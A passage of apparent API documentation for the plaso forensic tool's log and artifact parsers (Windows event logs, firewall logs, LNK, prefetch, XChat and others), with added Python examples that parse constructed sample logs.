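    """
    return line.rstrip('\r\n').split(delimiter)


def VerifyRow(fields, columns=COLUMNS, min_columns=MIN_COLUMNS):
    """Accepts a row only if it has at least min_columns and no extra fields.

    Assumed rule for this example: a row with more fields than named columns
    is rejected rather than truncated, because that usually means a value
    contained the delimiter and every later column would be shifted.
    """
    return min_columns <= len(fields) <= len(columns)


def ParseRow(line, columns=COLUMNS):
    """Returns a dictionary keyed by column name, or None for a malformed row."""
    fields = SplitRow(line)
    if not VerifyRow(fields, columns):
        return None
    row = dict.fromkeys(columns)       # trailing optional columns stay None
    row.update(zip(columns, fields))
    return row


# Constructed sample lines, not real Trend Micro output: a well-formed record,
# one whose path contains the delimiter, and one with too few fields.
SAMPLE_LINES = [
    '20200101<;>1200<;>TestThreat<;>Quarantine<;>Manual<;>0<;>C:\\Temp\\'
    '<;>sample.bin<;>0<;>1577880000<;>0<;>0',
    '20200101<;>1201<;>TestThreat<;>Clean<;>Manual<;>0<;>C:\\a<;>b\\'
    '<;>sample.bin<;>0<;>1577880060<;>0<;>0',
    '20200101<;>1202<;>TestThreat<;>Clean',
]


def Demo(lines=SAMPLE_LINES):
    """Parses each sample line; malformed rows come back as None."""
    return [ParseRow(line) for line in lines]
```

Rejecting over-long rows is a conservative choice: the alternative, keeping the first twelve fields, would silently file the shifted values under the wrong column names, which is worse in a timeline than a dropped row that the parser can report.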
class plaso.parsers.trendmicroav.TrendMicroUrlEventData
Bases: plaso.containers.events.EventData
Trend Micro Web Reputation Log event data.
block_mode: operation mode.
Type str
url: accessed URL.
Type str
group_code: group code.
Type str
group_name: group name.
Type str
credibility_rating: credibility rating.
Type int
credibility_score: credibility score.
Type int
policy_identifier: policy identifier.
Type int
application_name: application name.
Type str
ip: IP address.
Type str
threshold: threshold value.
Type int
DATA_TYPE = 'av:trendmicro:webrep'
plaso.parsers.utmp module
Parser for Linux utmp files.
class plaso.parsers.utmp.UtmpEventData
Bases: plaso.containers.events.EventData
utmp event data.
exit_status: exit status.
Type int
hostname: hostname or IP address.
Type str
ip_address: IP address from the connection.
Type str
pid: process identifier (PID).
Type int
terminal_identifier: inittab identifier.
Type int
terminal: type of terminal.
Type str
type: type of login.
Type int
username: user name.
Type str
DATA_TYPE = 'linux:utmp:event'
class plaso.parsers.utmp.UtmpParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for Linux libc6 utmp files.
DATA_FORMAT = 'Linux libc6 utmp file'
NAME = 'utmp'
ParseFileObject(parser_mediator, file_object)
Parses a utmp file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.utmpx module
Parser for utmpx files.
class plaso.parsers.utmpx.UtmpxMacOSEventData
Bases: plaso.containers.events.EventData
MacOS utmpx event data.
hostname: hostname or IP address.
Type str
pid: process identifier (PID).
Type int
terminal: name of the terminal.
Type str
terminal_identifier: inittab identifier.
Type int
type: type of login.
Type int
username: user name.
Type str
DATA_TYPE = 'mac:utmpx:event'
class plaso.parsers.utmpx.UtmpxParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for Mac OS X 10.5 utmpx files.
DATA_FORMAT = 'Mac OS X 10.5 utmpx file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'utmpx'
ParseFileObject(parser_mediator, file_object)
Parses a UTMPX file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.vsftpd module
Parser for vsftpd Logs.
class plaso.parsers.vsftpd.VsftpdEventData
Bases: plaso.containers.events.EventData
vsftpd Log event data.
text: vsftpd log message.
Type str
DATA_TYPE = 'vsftpd:log'
class plaso.parsers.vsftpd.VsftpdLogParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses a vsftpd log.
DATA_FORMAT = 'vsftpd log file'
LINE_STRUCTURES = [('logline', {Group:({{{{{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} W:(0123...)}) SkipTo:(lineEnd)})]
NAME = 'vsftpd'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verify that this file is a vsftpd log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
plaso.parsers.winevt module
Parser for Windows EventLog (EVT) files.
class plaso.parsers.winevt.WinEvtParser
Bases: plaso.parsers.interface.FileObjectParser
Parses Windows EventLog (EVT) files.
DATA_FORMAT = 'Windows EventLog (EVT) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'winevt'
ParseFileObject(parser_mediator, file_object)
Parses a Windows EventLog (EVT) file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
class plaso.parsers.winevt.WinEvtRecordEventData
Bases: plaso.containers.events.EventData
Windows EventLog (EVT) record event data.
computer_name: computer name stored in the event record.
Type str
event_category: event category.
Type int
event_identifier: event identifier.
Type int
event_type: event type.
Type int
facility: event facility.
Type int
message_identifier: event message identifier.
Type int
record_number: event record number.
Type int
recovered: True if the record was recovered.
Type bool
severity: event severity.
Type int
source_name: name of the event source.
Type str
strings: event strings.
Type list[str]
user_sid: user security identifier (SID) stored in the event record.
Type str
DATA_TYPE = 'windows:evt:record'
plaso.parsers.winevtx module
Parser for Windows XML EventLog (EVTX) files.
class plaso.parsers.winevtx.WinEvtxParser
Bases: plaso.parsers.interface.FileObjectParser
Parses Windows XML EventLog (EVTX) files.
DATA_FORMAT = 'Windows XML EventLog (EVTX) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'winevtx'
ParseFileObject(parser_mediator, file_object)
Parses a Windows XML EventLog (EVTX) file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
class plaso.parsers.winevtx.WinEvtxRecordEventData
Bases: plaso.containers.events.EventData
Windows XML EventLog (EVTX) record event data.
computer_name: computer name stored in the event record.
Type str
event_identifier: event identifier.
Type int
event_level: event level.
Type int
message_identifier: event message identifier.
Type int
record_number: event record number.
Type int
recovered: True if the record was recovered.
Type bool
source_name: name of the event source.
Type str
strings: event strings.
Type list[str]
user_sid: user security identifier (SID) stored in the event record.
Type str
xml_string: XML representation of the event.
Type str
DATA_TYPE = 'windows:evtx:record'
plaso.parsers.winfirewall module
Parser for Windows Firewall log files.
class plaso.parsers.winfirewall.WinFirewallEventData
Bases: plaso.containers.events.EventData
Windows Firewall event data.
action: action taken, for example ALLOW or DROP.
Type str
protocol: IP protocol, for example TCP, UDP or ICMP.
Type str
source_ip: source IP address.
Type str
dest_ip: destination IP address.
Type str
source_port: TCP or UDP source port.
Type int
dest_port: TCP or UDP destination port.
Type int
size: size of the packet, in bytes.
Type int
flags: TCP flags.
Type str
tcp_seq: TCP sequence number.
Type int
tcp_ack: TCP acknowledgement number.
Type int
tcp_win: TCP window size.
Type int
icmp_type: ICMP type.
Type int
icmp_code: ICMP code.
Type int
info: action-dependent additional information.
Type str
path: direction of the packet: SEND, RECEIVE, FORWARD or UNKNOWN.
Type str
DATA_TYPE = 'windows:firewall:log_entry'
class plaso.parsers.winfirewall.WinFirewallParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses the Windows Firewall log file. Lines starting with '#' are header comments. Fields that do not apply to a record (for example the TCP fields of an ICMP packet) appear as '-' in the log and are suppressed by the grammar.
DATA_FORMAT = 'Windows Firewall log file'
LINE_STRUCTURES = [('comment', {"#" SkipTo:(LineEnd)}), ('logline', {{{{{{{{{{{{{{{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{IPv4 address | IPv6 address} | Suppress:("-")}} {{IPv4 address | IPv6 address} | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}})]
NAME = 'winfirewall'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verify that this file is a firewall log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
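The grammar above is hard to read as a pyparsing repr, so here is a stand-alone parser for the same line format, written for this page as an added example; it is not plaso's WinFirewallParser. It maps the seventeen W3C-style columns onto the WinFirewallEventData attribute names, turns '-' into None, validates the addresses, and keeps the timestamp naive because the log header says the times are local. The sample log is constructed (documentation address ranges), and the triage helper at the end is an assumption about what an analyst would do with the result, not part of plaso.

```python
"""Parse Windows Firewall log (pfirewall.log) lines into event dicts.

Added example for this page; not plaso's own parser.
"""
import ipaddress
from datetime import datetime
from typing import Dict, List, Optional

# Constructed sample log. Header and column order follow the Windows
# Firewall W3C-style format; addresses are from documentation ranges.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2020-10-07 13:05:22 DROP TCP 203.0.113.9 192.0.2.15 51342 445 52 S 1790346781 0 8192 - - - RECEIVE
2020-10-07 13:05:23 ALLOW UDP 192.0.2.15 192.0.2.1 53801 53 0 - - - - - - - SEND
2020-10-07 13:05:24 DROP ICMP 203.0.113.9 192.0.2.15 - - 84 - - - - 8 0 - RECEIVE
"""

# Attribute names follow WinFirewallEventData; order follows the #Fields line.
FIELDS = ("date", "time", "action", "protocol", "source_ip", "dest_ip",
          "source_port", "dest_port", "size", "flags", "tcp_seq", "tcp_ack",
          "tcp_win", "icmp_type", "icmp_code", "info", "path")
INT_FIELDS = {"source_port", "dest_port", "size", "tcp_seq", "tcp_ack",
              "tcp_win", "icmp_type", "icmp_code"}


def parse_firewall_line(line: str) -> Optional[Dict[str, object]]:
    """Return one event dict for a log line, or None for comment/blank lines.

    A '-' means the field does not apply (ports for ICMP, TCP fields for UDP)
    and becomes None. Raises ValueError if the column count is wrong.
    """
    line = line.rstrip("\r\n")
    if not line.strip() or line.startswith("#"):
        return None
    tokens = line.split()
    if len(tokens) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(tokens)}: {line!r}")
    event: Dict[str, object] = {}
    for name, token in zip(FIELDS, tokens):
        if token == "-":
            event[name] = None
        elif name in INT_FIELDS:
            event[name] = int(token)
        else:
            event[name] = token
    # Fail loudly on a corrupt address instead of storing junk as an "IP".
    for name in ("source_ip", "dest_ip"):
        if event[name] is not None:
            ipaddress.ip_address(str(event[name]))
    # "#Time Format: Local": keep the timestamp naive; the caller applies the
    # host time zone (plaso takes it from preprocessing).
    event["timestamp"] = datetime.strptime(
        f"{event.pop('date')} {event.pop('time')}", "%Y-%m-%d %H:%M:%S")
    return event


def parse_firewall_log(text: str) -> List[Dict[str, object]]:
    """Parse a whole log, skipping the '#' header lines."""
    events = []
    for line in text.splitlines():
        event = parse_firewall_line(line)
        if event is not None:
            events.append(event)
    return events


def dropped_inbound_to_port(events: List[Dict[str, object]], port: int):
    """Hypothetical triage helper: inbound DROP events for one destination port."""
    return [e for e in events
            if e["action"] == "DROP" and e["path"] == "RECEIVE"
            and e["dest_port"] == port]


if __name__ == "__main__":
    for e in parse_firewall_log(SAMPLE_LOG):
        print(e["timestamp"], e["action"], e["protocol"],
              e["source_ip"], "->", e["dest_ip"], e["dest_port"])
```

Because the '-' placeholders are converted to None rather than dropped, every event carries the same keys, which is what you want when loading the result into a dataframe or a SIEM; plaso's grammar instead suppresses the placeholder and leaves the attribute unset.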
plaso.parsers.winjob module
Parser for Windows Scheduled Task job files.
class plaso.parsers.winjob.WinJobEventData
Bases: plaso.containers.events.EventData
Windows Scheduled Task event data.
application: path to the job executable.
Type str
description: description of the scheduled task.
Type str
parameters: application command line parameters.
Type str
trigger_type: trigger type.
Type int
username: username that scheduled the task.
Type str
working_directory: working directory of the scheduled task.
Type str
DATA_TYPE = 'windows:tasks:job'
class plaso.parsers.winjob.WinJobParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parses Windows Scheduled Task files for job events.
DATA_FORMAT = 'Windows Scheduled Task job (or at-job) file'
NAME = 'winjob'
ParseFileObject(parser_mediator, file_object)
Parses a Windows job file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.winlnk module
Parser for Windows Shortcut (LNK) files.
class plaso.parsers.winlnk.WinLnkLinkEventData
Bases: plaso.containers.events.EventData
Windows Shortcut (LNK) link event data.
birth_droid_file_identifier: distributed link tracking birth droid file identifier.
Type str
birth_droid_volume_identifier: distributed link tracking birth droid volume identifier.
Type str
command_line_arguments: command line arguments.
Type str
description: description of the linked item.
Type str
drive_serial_number: serial number of the drive where the linked item resides.
Type int
drive_type: type of the drive where the linked item resided.
Type str
droid_file_identifier: distributed link tracking droid file identifier.
Type str
droid_volume_identifier: distributed link tracking droid volume identifier.
Type str
env_var_location: environment variables location.
Type str
file_attribute_flags: file attribute flags of the linked item.
Type int
file_size: size of the linked item.
Type int
icon_location: icon location.
Type str
link_target: shell item list of the link target.
Type str
local_path: local path of the linked item.
Type str
network_path: network path of the linked item.
Type str
relative_path: relative path.
Type str
volume_label: label of the volume where the linked item resided.
Type str
working_directory: working directory.
Type str
DATA_TYPE = 'windows:lnk:link'
class plaso.parsers.winlnk.WinLnkParser
Bases: plaso.parsers.interface.FileObjectParser
Parses Windows Shortcut (LNK) files.
DATA_FORMAT = 'Windows Shortcut (LNK) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'lnk'
ParseFileLNKFile(parser_mediator, file_object, display_name)
Parses a Windows Shortcut (LNK) file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
• display_name (str) – display name.
ParseFileObject(parser_mediator, file_object)
Parses a Windows Shortcut (LNK) file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
plaso.parsers.winprefetch module
Parser for Windows Prefetch files.
class plaso.parsers.winprefetch.WinPrefetchExecutionEventData
Bases: plaso.containers.events.EventData
Windows Prefetch event data.
executable: executable filename.
Type str
format_version: format version.
Type int
mapped_files: mapped filenames.
Type list[str]
number_of_volumes: number of volumes.
Type int
path_hints: possible full paths to the executable.
Type list[str]
prefetch_hash: prefetch hash.
Type int
run_count: run count.
Type int
volume_device_paths: volume device paths.
Type list[str]
volume_serial_numbers: volume serial numbers.
Type list[int]
DATA_TYPE = 'windows:prefetch:execution'
class plaso.parsers.winprefetch.WinPrefetchParser
Bases: plaso.parsers.interface.FileObjectParser
A parser for Windows Prefetch files.
DATA_FORMAT = 'Windows Prefetch File (PF)'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'prefetch'
ParseFileObject(parser_mediator, file_object)
Parses a Windows Prefetch file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
plaso.parsers.winreg module
Parser for Windows NT Registry (REGF) files.
class plaso.parsers.winreg.WinRegistryParser
Bases: plaso.parsers.interface.FileObjectParser
Parses Windows NT Registry (REGF) files.
DATA_FORMAT = 'Windows NT Registry (REGF) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
NAME = 'winreg'
ParseFileObject(parser_mediator, file_object)
Parses a Windows Registry file-like object.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• file_object (dfvfs.FileIO) – a file-like object.
plaso.parsers.winrestore module
Parser for Windows Restore Point (rp.log) files.
class plaso.parsers.winrestore.RestorePointEventData
Bases: plaso.containers.events.EventData
Windows Restore Point event data.
description: description.
Type str
restore_point_event_type: restore point event type.
Type str
restore_point_type: restore point type.
Type str
sequence_number: sequence number.
Type str
DATA_TYPE = 'windows:restore_point:info'
class plaso.parsers.winrestore.RestorePointLogParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
A parser for Windows Restore Point (rp.log) files.
DATA_FORMAT = 'Windows Restore Point log (rp.log) file'
FILTERS = frozenset({<plaso.parsers.interface.FileNameFileEntryFilter object>})
NAME = 'rplog'
ParseFileObject(parser_mediator, file_object)
Parses a Windows Restore Point (rp.log) log file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.xchatlog module
This file contains the XChat log file parser in plaso.
Information updated 24 July 2013.
The parser applies to XChat log files. Despite their apparent simplicity it is not straightforward to handle every possible case. XChat lets users specify how the timestamp is encoded (using the strftime function) and lets them add separators of their own. This parser accepts only the simplest default English form of an XChat log file, such as the following:

**** BEGIN LOGGING AT Mon Dec 31 21:11:55 2001
dec 31 21:11:55 --> You are now talking on #gugle
dec 31 21:11:55 --- Topic for #gugle is plaso, nobody knows what it means
dec 31 21:11:55 Topic for #gugle set by Kristinn
dec 31 21:11:55 --- Joachim gives voice to fpi
dec 31 21:11:55 * XChat here
dec 31 21:11:58 <fpi> ola plas-ing guys!
dec 31 21:12:00 <Kristinn> ftw!

The case of lines missing the month/day could also be handled by extracting that information from the header, but the parser logic would become intricate, since it would need to manage day transitions for chat lines crossing midnight. From the same limitation derives the last-day-of-the-year bug: the year comes only from the header, and the parser does not manage the transition into the next year.
Moreover strftime is locale-dependent, so month names, footer and header can change, even inside the same log file. That said, the following is the main logic used to parse the log files (note that the first header must be '**** BEGIN ...', otherwise the file is skipped).
1) Check for '****'
   1.1) If 'BEGIN LOGGING AT' (English)
        1.1.1) Extract the YEAR
        1.1.2) Generate a new "start logging" event
        1.1.3) Set parsing = True
   1.2) If 'END LOGGING'
        1.2.1) If parsing, set parsing = False
        1.2.2) If not parsing, log debug
        1.2.3) Generate a new "end logging" event
   1.3) If neither BEGIN nor END, we are facing a different language and we don't know which one! If parsing is True, set parsing = False and log debug
2) Not '****', so we are parsing a line
   2.1) If parsing = True, try to parse the line and generate an event
   2.2) If parsing = False, skip until the next good header is found
References http://xchat.org
class plaso.parsers.xchatlog.XChatLogEventData
Bases: plaso.containers.events.EventData
XChat Log event data.
nickname: nickname.
Type str
text: text sent by the nickname, or other text (server messages, etc.).
Type str
DATA_TYPE = 'xchat:log:line'
class plaso.parsers.xchatlog.XChatLogParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses XChat log files.
DATA_FORMAT = 'XChat log file'
LINE_STRUCTURES = [('logline', {{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) [quoted string, starting with < ending with >]} SkipTo:(lineEnd)}), ('header', {{Suppress:("****") Group:({{W:(0123...) W:(0123...)} W:(0123...)})} Group:({{{{Group:({{{{{{"Sun" | "Mon"} | "Tue"} | "Wed"} | "Thu"} | "Fri"} | "Sat"}) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} W:(0123...)})}), ('header_signature', "****")]
NAME = 'xchatlog'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verify that this file is an XChat log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
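The numbered procedure above is a small state machine, and it is easiest to see why the "different language" and "END without BEGIN" branches matter by running it. The following is an added example written for this page, not plaso's XChatLogParser: it implements steps 1.1 through 2.2 as written, takes the year from the BEGIN header, and skips everything after a header it cannot classify until the next English BEGIN. The sample log is constructed from the page's example plus an END header, a non-English header and a second session; like the page's parser it does not handle a log crossing New Year.

```python
"""State machine for XChat log files (added example, not plaso's parser)."""
import logging
import re
from datetime import datetime
from typing import Dict, List, Optional

LOG = logging.getLogger("xchatlog_example")

# Constructed sample: the page's example log, an END header, a non-English
# header (Italian, invented here) whose lines must be skipped, and a new session.
SAMPLE_LOG = """\
**** BEGIN LOGGING AT Mon Dec 31 21:11:55 2001
dec 31 21:11:55 --> You are now talking on #gugle
dec 31 21:11:55 --- Topic for #gugle is plaso, nobody knows what it means
dec 31 21:11:58 <fpi> ola plas-ing guys!
dec 31 21:12:00 <Kristinn> ftw!
**** END LOGGING AT Mon Dec 31 21:12:05 2001
**** INIZIO LOG IN Tue Jan 01 10:00:00 2002
gen 01 10:00:01 <fpi> questa riga non viene analizzata
**** BEGIN LOGGING AT Tue Jan 01 10:05:00 2002
jan 01 10:05:01 <Kristinn> back again
"""

MONTHS = {m: i for i, m in enumerate(
    ("jan", "feb", "mar", "apr", "may", "jun",
     "jul", "aug", "sep", "oct", "nov", "dec"), 1)}
LINE_RE = re.compile(
    r"^(?P<mon>[A-Za-z]{3}) (?P<day>\d{1,2}) "
    r"(?P<h>\d{2}):(?P<m>\d{2}):(?P<s>\d{2}) (?P<rest>.*)$")
NICK_RE = re.compile(r"^<(?P<nick>[^>]+)> (?P<text>.*)$")
HEADER_TIME_FMT = "%a %b %d %H:%M:%S %Y"   # 'Mon Dec 31 21:11:55 2001'


def _parse_header_time(line: str, marker: str) -> Optional[datetime]:
    """Return the datetime that follows `marker` in a '****' header, or None."""
    try:
        return datetime.strptime(line.split(marker, 1)[1].strip(), HEADER_TIME_FMT)
    except (IndexError, ValueError):
        return None


def parse_xchat_log(text: str) -> List[Dict[str, object]]:
    """Apply the page's steps 1) and 2) line by line and collect events."""
    events: List[Dict[str, object]] = []
    parsing = False
    year: Optional[int] = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("****"):                          # step 1
            if "BEGIN LOGGING AT" in line:                   # 1.1 (English)
                header_time = _parse_header_time(line, "BEGIN LOGGING AT")
                if header_time is None:
                    LOG.debug("line %d: unparseable BEGIN header", lineno)
                    parsing = False
                    continue
                year = header_time.year                      # 1.1.1
                events.append({"timestamp": header_time, "nickname": None,
                               "text": "XChat start logging"})   # 1.1.2
                parsing = True                               # 1.1.3
            elif "END LOGGING" in line:                      # 1.2
                if not parsing:
                    LOG.debug("line %d: END LOGGING without BEGIN", lineno)  # 1.2.2
                parsing = False                              # 1.2.1
                header_time = _parse_header_time(line, "END LOGGING AT")
                if header_time is not None:                  # 1.2.3
                    events.append({"timestamp": header_time, "nickname": None,
                                   "text": "XChat end logging"})
            else:                                            # 1.3 unknown language
                if parsing:
                    LOG.debug("line %d: unknown header, parsing stopped", lineno)
                parsing = False
            continue
        if not parsing:                                      # 2.2
            continue
        match = LINE_RE.match(line)                          # 2.1
        if not match or match.group("mon").lower() not in MONTHS or year is None:
            LOG.debug("line %d: not a log line", lineno)
            continue
        # Year only from the header: no New Year transition, as on the page.
        timestamp = datetime(year, MONTHS[match.group("mon").lower()],
                             int(match.group("day")), int(match.group("h")),
                             int(match.group("m")), int(match.group("s")))
        rest = match.group("rest")
        nick_match = NICK_RE.match(rest)
        if nick_match:
            events.append({"timestamp": timestamp, "nickname": nick_match.group("nick"),
                           "text": nick_match.group("text")})
        else:
            events.append({"timestamp": timestamp, "nickname": None, "text": rest})
    return events


if __name__ == "__main__":
    for event in parse_xchat_log(SAMPLE_LOG):
        print(event["timestamp"], event["nickname"] or "-", event["text"])
```

The Italian header is deliberately close to a real one: it carries a parseable date, but because it is neither BEGIN nor END the machine stops parsing, so the Italian line is dropped instead of being stamped with the wrong year or mistaken for a nickname line. That is the behaviour to expect from plaso on a non-English XChat log, and the reason such logs show up in a timeline as gaps rather than as garbage.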
plaso.parsers.xchatscrollback module
This file contains the XChat scrollback log file parser in plaso.
Information updated 06 September 2013.
Besides its logging capability, the XChat IRC client has the option to record the text of open tabs, so that when rejoining a particular channel and/or conversation XChat displays the last messages exchanged. This artifact can be present, unless disabled, even when normal logging is disabled.
From the XChat FAQ (http://xchatdata.net/Using/FAQ):
Q: 'How do I keep text from previous sessions from being displayed when I join a channel?'
R: 'Starting in XChat 2.8.4, XChat implemented the Scrollback feature which displays text from the last time you had a particular tab open. To disable this setting for all channels, Go to Settings -> Preferences -> Logging and uncheck Display scrollback from previous session. In XChat 2.8.6, XChat implemented both Per Channel Logging, and Per Channel Scrollbacks. If you are on 2.8.6 or newer, you can disable loading scrollback for just one particular tab name by right clicking on the tab name, selecting Settings, and then unchecking Reload scrollback'
The log file format differs from the logging format, but it is quite simple:
T 1232315916 Python interface unloaded
<T><space><decimal timestamp><space><text><newline>
The time reported in the log is the number of seconds since January 1, 1970 00:00:00 UTC (from the source code, time(0)). The <text> part can contain 'decorators' (bold, underline, colour indications, etc.), so the parser should strip those control fields.
References http://xchat.org
class plaso.parsers.xchatscrollback.XChatScrollbackEventData
Bases: plaso.containers.events.EventData
XChat Scrollback line event data.
nickname: nickname.
Type str
text: text sent by the nickname, or service messages.
Type str
DATA_TYPE = 'xchat:scrollback:line'
class plaso.parsers.xchatscrollback.XChatScrollbackParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses XChat scrollback log files.
DATA_FORMAT = 'XChat scrollback log file'
LINE_STRUCTURES = [('logline', {{Suppress:("T") W:(0123...)} SkipTo:(LineEnd)})]
LOG_LINE = {{Suppress:("T") W:(0123...)} SkipTo:(LineEnd)}
MSG_ENTRY = {[{{"<" SkipTo:(">")} ">"}] SkipTo:(LineEnd)}
MSG_ENTRY_NICK = [{{"<" SkipTo:(">")} ">"}]
MSG_ENTRY_TEXT = SkipTo:(LineEnd)
MSG_NICK = SkipTo:(">")
MSG_NICK_END = ">"
MSG_NICK_START = "<"
NAME = 'xchatscrollback'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – structure parsed from the log file.
STRIPPER = {Suppress:(W:(, 0123...)) | Suppress:(W:(...))}
VerifyStructure(parser_mediator, line)
Verify that this file is an XChat scrollback log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line was successfully parsed.
Return type bool
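The scrollback format is three fields, but the part the text warns about is the decorators inside <text>. The example below, added for this page and not plaso's XChatScrollbackParser, parses 'T <epoch> <text>' lines, strips the IRC-style control codes (bold, colour, underline, reset; the exact set is an assumption about what STRIPPER removes), pulls the nickname out of the leading '<nick>' and converts the epoch to a UTC datetime. The sample lines are constructed.

```python
"""Parse XChat scrollback lines (added example, not plaso's parser)."""
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional

# Constructed sample. Control codes as used by XChat/mIRC-style clients
# (assumption): \x02 bold, \x03NN[,NN] colour, \x1f underline, \x0f reset.
SAMPLE_SCROLLBACK = (
    "T 1232315916 Python interface unloaded\n"
    "T 1232315920 <fpi> \x02hello\x02 \x034,12plaso\x03 people\n"
    "T 1232315925 <Kristinn> \x1fftw\x0f!\n"
    "not a scrollback line\n"
)

LINE_RE = re.compile(r"^T (?P<ts>\d+) (?P<text>.*)$")
NICK_RE = re.compile(r"^<(?P<nick>[^>]*)>\s?(?P<text>.*)$")
# Colour code with optional fg[,bg] numbers, or a single-byte toggle.
DECORATOR_RE = re.compile(r"\x03\d{0,2}(?:,\d{1,2})?|[\x02\x0f\x16\x1d\x1f]")


def strip_decorators(text: str) -> str:
    """Remove display control codes so the stored text is what the user read."""
    return DECORATOR_RE.sub("", text)


def verify_scrollback_line(line: str) -> bool:
    """VerifyStructure-style check on a single line."""
    return LINE_RE.match(line.rstrip("\r\n")) is not None


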